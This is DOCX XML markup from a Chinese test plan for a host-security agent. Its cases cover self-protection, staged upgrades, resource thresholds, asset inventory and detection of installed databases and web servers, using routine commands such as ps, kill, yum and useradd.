              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果3：输入正确的卸载密码成功卸载Agent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spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc1899786246"/>
      <w:bookmarkStart w:id="65" w:name="_Toc2611"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Agent自保护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1894" w:tblpY="856"/>
        <w:tblOverlap w:val="never"/>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t>Agent自保护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测试</w:t>
            </w:r>
            <w:r>
              <w:t>Agent是否具有自保护机制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t>主机操作系统到服务端网络访问关系通畅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ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>1. 登录测试机，ps -ef | grep 进程名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>拿到进程ID，执行Kill 进程ID。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2. 确认进程是否已经被杀掉，ps -ef | grep 进程名，查看进程是否存在。 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>. 如果确认进程被杀掉，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>10秒内</w:t>
            </w:r>
            <w:r>
              <w:t>，再次查看Agent进程，看是否被自动拉起。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t>Agent 被杀后，在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>10秒内</w:t>
            </w:r>
            <w:r>
              <w:t>被自动拉起。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66" w:name="_Toc920572926"/>
      <w:bookmarkStart w:id="67" w:name="_Toc4506"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Agent灰度更新发布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>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支持灰度更新Agent,指定服务器和指定时间进行升级；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支持灰度更新Agent,指定服务器和指定时间进行升级；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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>准备高版本Agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务端新建分组：主机安全测试-1，组内包括Oracle-76-01和Redhat-67-01；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                   主机安全测试-2，组内包括Oracle-76-02和Redhat-67-02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31"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端设置在时间点T1对主机安全测试-1组进行Redhat-67-01升级；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在T1+20分钟后在服务端确认主机安全测试-1组内Redhat-67-01的Agent版本是否升级为高版本，登录Redhat-67-01，ps auxf |grep </w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程名</w:t>
            </w:r>
            <w:r>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看Agent进程启动时间是否在T1+20分钟范围内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t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1：在服务端显示版本升级成功，且版本号为高版本</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：主机上Agent进程启动时间在指定的升级时间T1之后（T1+20分钟左右）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果3：升级成功后服务器无需重启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r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gent资源使用率管理</w:t>
      </w:r>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支持Agent自杀降级的设置；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可在服务端配置Agent资源使用率相关参数，特别是在主机资源占用过高的情况下，agent能自动释放自身进程CPU使用率；能够通过管理平台自定义在主机资源占用过高时下发agent对于CPU超限降级、自杀的阈值设置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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅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33"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>参考案例3.5.1的步骤1-2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结果1：界面上支持CPU超限降级、自杀的阈值设置且案例3.5.1测试通过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支持超限降级阈值配置 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持超限自杀阈值配置 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc1096339052"/>
      <w:bookmarkStart w:id="69" w:name="_Toc452"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产清点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc760755704"/>
      <w:bookmarkStart w:id="71" w:name="_Toc22933"/>
      <w:r>
        <w:t>资产变更分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblW w:w="91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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>资产变更分析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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>精确资产信息变化情况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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsi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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>登录测试机（Oracle-76-01），在root下执行：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>yum install -y telnet</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>useradd test123</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>在服务端重新触发采集这台主机资产</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>在服务端对应页面查看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87" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>结果1：服务端可以看到新增telnet软件应用（Oracle-76-01）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>结果2：服务端可以看到新增帐号test123及其所在主机IP（Oracle-76-01）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87"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87"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87"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87"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87"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72" w:name="_Toc1474"/>
      <w:bookmarkStart w:id="73" w:name="_Toc2050966537"/>
      <w:bookmarkStart w:id="74" w:name="_Toc11989"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产一键</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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资产一键搜索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服务端支持在一个页面对所有类型资产进行一键搜索，快速筛选出与关键字匹配的相关资产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pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
            </w:pPr>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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进入服务端一键搜页面，页面包含各类资产；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过关键字搜索，可以在一个页面快速定位与关键字相关的不同类型资产，输入db关键字进行搜索，在页面上查看结果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结果1：可以搜索到帐号资产中db用户以及包含关键字db的任何资产。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75" w:name="_Toc1334569362"/>
      <w:bookmarkStart w:id="76" w:name="_Toc24174"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>数据库信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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数据库信息采集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cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>能够识别出主机上安装的数据库软件，包括Mysql、Oracle等，并且识别出其安装路径、端口、版本、运行用户等。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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先正确安装Mysql、Oracle、；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsi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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>查看主机资产中的数据库功能，即可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能够识别出所有主机上安装的数据库软件，包括Mysql、Oracle、</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Oracle-76-02</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/db/mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—5.5.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>监听端口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—3306</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>运行用户</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—db</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r>
              <w:t>racle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机— Oracle-76-02</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/opt/oracle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—19.3.0.0.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>监听端口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>1521</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>运行用户</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—oracle</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支持采集mysql：口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>支持采集</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>oracle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>：  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77" w:name="_Toc12618"/>
      <w:bookmarkStart w:id="78" w:name="_Toc1788057866"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Web服务信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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t>W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb服务信息采集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能够识别出主机上安装的Web服务，包括Apache、Tomcat、Weblogic、Nginx等，并识别出其版本、安装路径信息、启动文件路径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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w:t>ent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机预先安装Apache、Tomcat、Weblogic、Nginx等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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsi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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>查看主机资产中的web容器功能，即可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能够识别出所有主机上安装的Web服务，包括Apache、Tomcat、Weblogic、Nginx等</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pache:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Oracle-76-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>httpd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>2.4.38</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动文件路径—/home/soft/ httpd /bin/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>tomcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Oracle-76-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/tomcat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>8.5.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动文件路径—/home/soft/tomcat/bin/catalina.sh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Weblogic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Redhat-67-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/weblogic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>10.0.3.6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动文件路径—</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/weblogic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
